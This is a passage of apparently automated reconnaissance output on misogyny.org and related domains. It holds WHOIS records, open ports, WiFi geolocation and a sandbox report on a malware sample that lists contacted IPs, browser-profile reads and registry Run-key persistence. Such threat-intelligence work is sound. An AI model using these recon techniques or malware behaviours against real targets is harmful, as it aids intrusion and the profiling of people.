the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns1.dan.com Name Server: ns2.dan.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:59:51Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Domain name: misogyny.org Registry Domain ID: 306b87640a9a4177b66ed5ee2d15d5eb-LROR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-11-26T05:05:02.00Z Creation Date: 2000-01-03T07:35:22.43Z Registrar Registration Expiration Date: 2024-01-03T07:35:22.00Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: transferPeriod https://icann.org/epp#transferPeriod Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Name Server: ns1.dan.com Name Server: ns2.dan.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T21:59:51.97Z <<< For more information on Whois status codes, please visit https://icann.org/epp misogyny.org 2022-12-18 00:18:15 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.5:8443 188.114.97.0/24 2022-12-18 00:06:15 Linked URL - Internal No Web Spider 0 0 1 0 None http://misogyny.wtf/ misogyny.wtf 2022-12-18 00:03:10 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.236 81.88.52.232 2022-12-18 00:21:30 Physical Location No Censys 0 0 2 0 None United States, North America 172.67.190.129 2022-12-18 00:24:56 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.179 90.116.149.183 2022-12-18 00:09:02 Open TCP Port No LeakIX 0 0 2 0 None 188.114.97.1:443 188.114.97.1 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None TEO Network Enterprise (Net ID: 00:01:24:F0:B7:E1) 37.780462,-122.390564 2022-12-18 00:13:40 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.128:8080 188.114.96.0/24 2022-12-18 00:06:31 Company Name No Company Name Extractor 0 0 2 0 None NameCheap, Inc. Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77aa7502b9001b65-ORD 188.114.97.1 2022-12-18 00:26:49 Affiliate - Domain Whois No Whois 5 0 6 0 None Domain Name: dominiando.us Registry Domain ID: D19621490-US Registrar WHOIS Server: Registrar URL: https://key-systems.net Updated Date: 2022-06-06T00:00:06Z Creation Date: 2009-04-22T11:21:03Z Registry Expiry Date: 2023-04-21T23:59:59Z Registrar: Key-Systems GmbH Registrar IANA ID: 269 Registrar Abuse Contact Email: abuse@key-systems.net Registrar Abuse Contact Phone: +49.6894939685 Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: C19621489-US Registrant Name: Francesco Pacaccio Registrant Organization: Dominiando Srl Registrant Street: Piazzale Clodio 8 Registrant Street: Registrant Street: Registrant City: Roma Registrant State/Province: Registrant Postal Code: 00195 Registrant Country: IT Registrant Phone: +39.068072248 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: domini@dominiando.it Registrant Application Purpose: P1 Registrant Nexus Category: C31/IT Registry Admin ID: C19621489-US Admin Name: Francesco Pacaccio Admin Organization: Dominiando Srl Admin Street: Piazzale Clodio 8 Admin Street: Admin Street: Admin City: Roma Admin State/Province: Admin Postal Code: 00195 Admin Country: IT Admin Phone: +39.068072248 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: domini@dominiando.it Admin Application Purpose: P1 Admin Nexus Category: C31/IT Registry Tech ID: C2262438-US Tech Name: Domain Management Tech Organization: Dominiando Srl Tech Street: Piazzale Clodio 8 Tech Street: Tech Street: Tech City: Rome Tech State/Province: IT Tech Postal Code: 00195 Tech Country: IT Tech Phone: +39.0680693248 Tech Phone Ext: Tech Fax: +39.06233200178 Tech Fax Ext: Tech Email: domini@dominiando.it Tech Application Purpose: P1 Tech Nexus Category: C31/IT Name Server: ns.dominiando.it Name Server: ns.dominiando.asia Name Server: ns.dominiando.uk Name Server: ns.dominiando.us DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:26:49Z <<< For more information on Whois status codes, please visit https://icann.org/epp .US WHOIS Complaint Tool - http://www.whoiscomplaints.us Advanced WHOIS Instructions - http://whois.us/help.html Registry Services, LLC, the Registry Administrator for .US, has collected this information for the WHOIS database through a .US-Accredited Registrar. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the registry database. Registry Services, LLC makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection laws; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without our prior written permission. We reserve the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms. NOTE: FAILURE TO LOCATE A RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME. All domain names are subject to certain additional domain name registration rules. For details, please visit our site at www.whois.us. dominiando.us 2022-12-18 00:14:32 Country No Country Name Extractor 0 1 3 0 None Iceland +3544212434 2022-12-18 00:04:28 Email Gateway (DNS MX Records) No DNS Raw Records 0 0 1 0 None eforward4.registrar-servers.com misogyny.wtf 2022-12-18 00:21:06 Open TCP Port No Censys 0 0 2 0 None 172.67.147.230:2083 172.67.147.230 2022-12-18 00:13:46 Affiliate - Email Address No E-Mail Address Extractor 0 0 4 0 None 6eadd514503047339410d1e131d27118.protect@withheldforprivacy.com Domain Name: REGISTRAR-SERVERS.COM Registry Domain ID: 1326800137_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2021-10-25T10:49:38Z Creation Date: 2007-11-08T15:04:30Z Registry Expiry Date: 2023-11-08T15:04:30Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited Name Server: EDNS1.REGISTRAR-SERVERS.COM Name Server: EDNS2.REGISTRAR-SERVERS.COM Name Server: EDNS4.ULTRADNS.COM Name Server: EDNS4.ULTRADNS.NET Name Server: EDNS4.ULTRADNS.ORG DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:10:42Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain name: registrar-servers.com Registry Domain ID: 1326800137_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2021-10-23T04:15:22.00Z Creation Date: 2007-11-08T15:04:30.00Z Registrar Registration Expiration Date: 2023-11-08T15:04:30.00Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: transferPeriod https://icann.org/epp#transferPeriod Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 6eadd514503047339410d1e131d27118.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 6eadd514503047339410d1e131d27118.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 6eadd514503047339410d1e131d27118.protect@withheldforprivacy.com Name Server: edns4.ultradns.net Name Server: edns4.ultradns.com Name Server: edns4.ultradns.org Name Server: edns1.registrar-servers.com Name Server: edns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T19:58:34.95Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:04:28 Name Server (DNS NS Records) No DNS Raw Records 0 0 1 0 None ns2.amenworld.com zerotwo-best-waifu.online 2022-12-18 00:21:06 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.147.230 2022-12-18 00:19:22 Raw Data from RIRs No Hybrid Analysis 0 0 3 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 4, u'threat_score': 81, u'compromised_hosts': [u'69.204.153.221', u'77.121.186.224', u'93.77.224.224', u'73.183.11.231', u'5.105.56.87', u'212.193.48.220'], u'environment_id': 4, u'major_os_version': None, u'submit_name': u'50f64a2f38a4de55e92654aaa72079e2', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"smtp.ltk.lv"\n "dcc.state.ar.us"\n "fmx.freemail.hu"\n "smtp.fsmail.net"\n "mitre.org"\n "yahoo.gr"\n "mx1.stratanet.com"\n "smtp1.wilsonsd.org"\n "mail.triton.net"\n "bankislam.com.my"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"69.204.153.221:80"\n "77.121.186.224:80"\n "93.77.224.224:80"\n "89.136.111.229:80"\n "73.183.11.231:80"\n "74.77.23.40:80"\n "178.137.117.54:80"\n "91.218.90.63:80"\n "5.105.56.87:80"\n "134.255.30.107:80"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-2', u'name': u'GETs files from a webserver', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /file.htm HTTP/1.1\nHost: 5.105.56.87\nContent-Length: 164\nUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0"\n "GET /login.htm HTTP/1.1\nHost: 5.105.56.87\nContent-Length: 1857\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"\n "GET /index.htm HTTP/1.1\nHost: 210.56.179.110\nContent-Length: 164"\n "GET /welcome.htm HTTP/1.1\nHost: 210.56.179.110\nContent-Length: 531\nUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0"'}, {u'category': u'Environment Awareness', u'origin': u'StaticStream (Disassembly)', u'identifier': u'stream-2', u'name': u'Contains ability to query machine time', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 1, u'description': u'GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-52256-1290-00515857\n GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-52256-1065-004517D8\n GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-52256-148-0042112B\n GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-52256-141-00506757\n GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-47776-148-0042112B\n GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-47776-141-00506757\n GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-47776-1065-004517D8\n GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-47776-1290-00515857'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-6', u'name': u'Reads configuration files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 4, u'threat_level': 1, u'type': 6, u'description': u'".exe" read file "C:\\Users\\PSPUBWS\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 156.154.70.22" with description "Payload with 27 bytes: 000401000001000000000000057961686F6F03636F6D00000F0001"\n "UDP connection to 208.67.220.220" with description "Payload with 27 bytes: 000501000001000000000000057961686F6F03636F6D00000F0001"\n "UDP connection to 156.154.71.1" with description "Payload with 27 bytes: 000601000001000000000000057961686F6F03636F6D00000F0001"\n "UDP connection to 156.154.70.1" with description "Payload with 27 bytes: 000A01000001000000000000057961686F6F03636F6D00000F0001"\n "UDP connection to 198.153.194.1" with description "Payload with 27 bytes: 001001000001000000000000057961686F6F03636F6D00000F0001"\n "UDP connection to 4.2.2.1" with description "Payload with 27 bytes: 001A0100000100000000000005676D61696C03636F6D00000F0001"'}, {u'category': u'Unusual Characteristics', u'origin': u'Hooks', u'identifier': u'hooks-8', u'name': u'Installs hooks/patches the running process', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 11, u'description': u'".exe" wrote bytes "4053427758584377186a4377653c44770000000000bf57770000000056cc5777000000007cca577700000000376871756a2c4477d62d447700000000206971750000000029a6577700000000a48d717500000000f70e577700000000" to virtual address "0x76BE1000" (part of module "NSI.DLL")'}, {u'category': u'Unusual Characteristics', u'origin': u'Registry Access', u'identifier': u'registry-25', u'name': u'Reads information about supported languages', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 3, u'description': u'".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE", Key: "EN-US")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE", Key: "EN-US")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE", Key: "AR")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE", Key: "AR")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE", Key: "AR-SA")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE", Key: "AR-SA")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE", Key: "BG")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE", Key: "BG")'}, {u'category': u'Unusual Characteristics', u'origin': u'Static Parser', u'identifier': u'static-1', u'name': u'Imports suspicious APIs', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 1, u'type': 0, u'description': u'CreateFileA\n GetModuleHandleA\n GetStartupInfoA\n GetModuleFileNameA\n listen (Ordinal #13)'}, {u'category': u'Installation/Persistance', u'origin': u'Registry Access', u'identifier': u'registry-0', u'name': u'Modifies auto-execute functionality by setting a value in the registry', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 8, u'threat_level': 1, u'type': 3, u'description': u'".exe" (Access type: "CREATE", Path: "\\REGISTRY\\MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN")\n ".exe" (Access type: "SETVAL", Path: "\\REGISTRY\\MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN", Key: "NETWORKUPDATER", Value: "C:\\94a258ebd0b0313bf9cc1aeddcd7473b2f4d383d6650fb394713dc3080faf84c.exe")'}, {u'category': u'Anti-Detection/Stealthyness', u'origin': u'API Call', u'identifier': u'api-38', u'name': u'Sets the process error mode to suppress error box', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 8, u'threat_level': 1, u'type': 6, u'description': u'".exe" set its error mode to SEM_NOOPENFILEERRORBOX'}, {u'category': u'Anti-Reverse Engineering', u'origin': u'StaticStream (Disassembly)', u'identifier': u'stream-4', u'name': u'Contains ability to register a top-level exception handler (often used as anti-debugging trick)', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 1, u'type': 1, u'description': u'SetUnhandledExceptionFilter@KERNEL32.DLL at 00011898-00002812-52256-39-00503341\n SetUnhandledExceptionFilter@KERNEL32.DLL at 00011898-00002812-52256-40-005019B4\n SetUnhandledExceptionFilter@KERNEL32.DLL at 00011898-00002812-52256-311-004D9E24\n SetUnhandledExceptionFilter@KERNEL32.DLL at 00011898-00002812-47776-39-00503341\n SetUnhandledExceptionFilter@KERNEL32.DLL at 00011898-00002812-47776-40-005019B4\n 